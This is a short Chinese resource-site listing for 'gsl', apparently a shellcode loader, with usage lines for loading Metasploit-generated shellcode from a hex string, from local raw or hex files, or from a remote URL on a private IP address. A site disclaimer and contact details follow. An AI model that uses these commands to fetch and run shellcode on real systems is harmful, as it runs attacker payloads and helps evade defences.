>gsl -s SHELLCODE -hex msf生成hex格式 >gsl -f shell.raw本地加载raw格式文件 >gsl -f shell.hex -hex 本地加载hex格式文件 >gsl -u http://192.168.0.108/1.raw 远程加载 >gsl -u http://192.168.0.108/1.hex 下载地址
|
乐享资源网来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,乐享资源网一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除
投稿邮箱:1372234654@qq.com 广告位购买QQ:1372234654
